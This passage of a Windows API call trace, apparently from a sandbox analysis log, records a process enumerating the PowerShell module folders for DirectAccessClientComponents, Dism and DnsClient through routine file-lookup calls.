ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.types.ps1xml", cAlternateFileName="")) returned 0 [0176.922] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0176.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0176.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0176.923] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\DirectAccessClientComponents.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\directaccessclientcomponents\\directaccessclientcomponents.psd1")) returned 0x20 [0176.925] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0176.925] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism", lpFilePart=0x0) returned 0x37 [0176.925] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\", lpFilePart=0x0) returned 0x38 [0176.966] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0176.967] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.967] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13694a95, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6291, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.Format.ps1xml", cAlternateFileName="")) returned 1 [0176.967] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x817, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.psd1", cAlternateFileName="")) returned 1 [0176.967] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.psm1", cAlternateFileName="")) returned 1 [0176.967] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.Types.ps1xml", cAlternateFileName="")) returned 1 [0176.968] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0176.968] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13694a95, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13694a95, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13694a95, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ee00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Dism.PowerShell.dll", cAlternateFileName="")) returned 1 [0176.968] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13694a95, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13694a95, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13694a95, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ee00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Dism.PowerShell.dll", cAlternateFileName="")) returned 0 [0176.968] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0176.968] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0176.968] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0176.968] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0176.968] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism", lpFilePart=0x0) returned 0x37 [0176.968] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\", lpFilePart=0x0) returned 0x38 [0176.968] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592910 [0176.969] FindNextFileW (in: hFindFile=0x1a592910, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.969] FindNextFileW (in: hFindFile=0x1a592910, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13694a95, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6291, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.Format.ps1xml", cAlternateFileName="")) returned 1 [0176.969] FindNextFileW (in: hFindFile=0x1a592910, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x817, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.psd1", cAlternateFileName="")) returned 1 [0176.969] FindNextFileW (in: hFindFile=0x1a592910, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.psm1", cAlternateFileName="")) returned 1 [0176.969] FindNextFileW (in: hFindFile=0x1a592910, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.Types.ps1xml", cAlternateFileName="")) returned 1 [0176.969] FindNextFileW (in: hFindFile=0x1a592910, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0176.970] FindNextFileW (in: hFindFile=0x1a592910, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13694a95, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13694a95, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13694a95, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ee00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Dism.PowerShell.dll", cAlternateFileName="")) returned 1 [0176.970] FindNextFileW (in: hFindFile=0x1a592910, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0176.970] FindClose (in: hFindFile=0x1a592910 | out: hFindFile=0x1a592910) returned 1 [0176.970] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0176.970] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0176.970] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism", lpFilePart=0x0) returned 0x37 [0176.970] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0176.970] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dism"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0176.970] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0176.970] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0176.970] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism", lpFilePart=0x0) returned 0x37 [0176.970] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\", lpFilePart=0x0) returned 0x38 [0176.970] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592a30 [0176.971] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.971] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13694a95, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6291, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.Format.ps1xml", cAlternateFileName="")) returned 1 [0176.971] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x817, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.psd1", cAlternateFileName="")) returned 1 [0176.971] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.psm1", cAlternateFileName="")) returned 1 [0176.971] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.Types.ps1xml", cAlternateFileName="")) returned 1 [0176.972] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0176.972] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13694a95, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13694a95, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13694a95, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ee00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Dism.PowerShell.dll", cAlternateFileName="")) returned 1 [0176.972] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13694a95, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13694a95, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13694a95, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ee00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Dism.PowerShell.dll", cAlternateFileName="")) returned 0 [0176.972] FindClose (in: hFindFile=0x1a592a30 | out: hFindFile=0x1a592a30) returned 1 [0176.972] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0176.972] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0176.972] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\Dism.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dism\\dism.psd1")) returned 0x20 [0176.973] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0176.973] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient", lpFilePart=0x0) returned 0x3c [0176.973] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\", lpFilePart=0x0) returned 0x3d [0176.974] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0176.976] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.976] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x68d, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient.psd1", cAlternateFileName="")) returned 1 [0176.976] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClientPSProvider.Format.ps1xml", cAlternateFileName="")) returned 1 [0176.976] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClientPSProvider.Types.ps1xml", cAlternateFileName="")) returned 1 [0176.976] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf0c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsCmdlets.Format.ps1xml", cAlternateFileName="")) returned 1 [0176.977] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5687, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsCmdlets.Types.ps1xml", cAlternateFileName="")) returned 1 [0176.977] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4f78, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsConfig.Format.ps1xml", cAlternateFileName="")) returned 1 [0176.977] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x44c, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsConfig.Types.ps1xml", cAlternateFileName="")) returned 1 [0176.977] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, 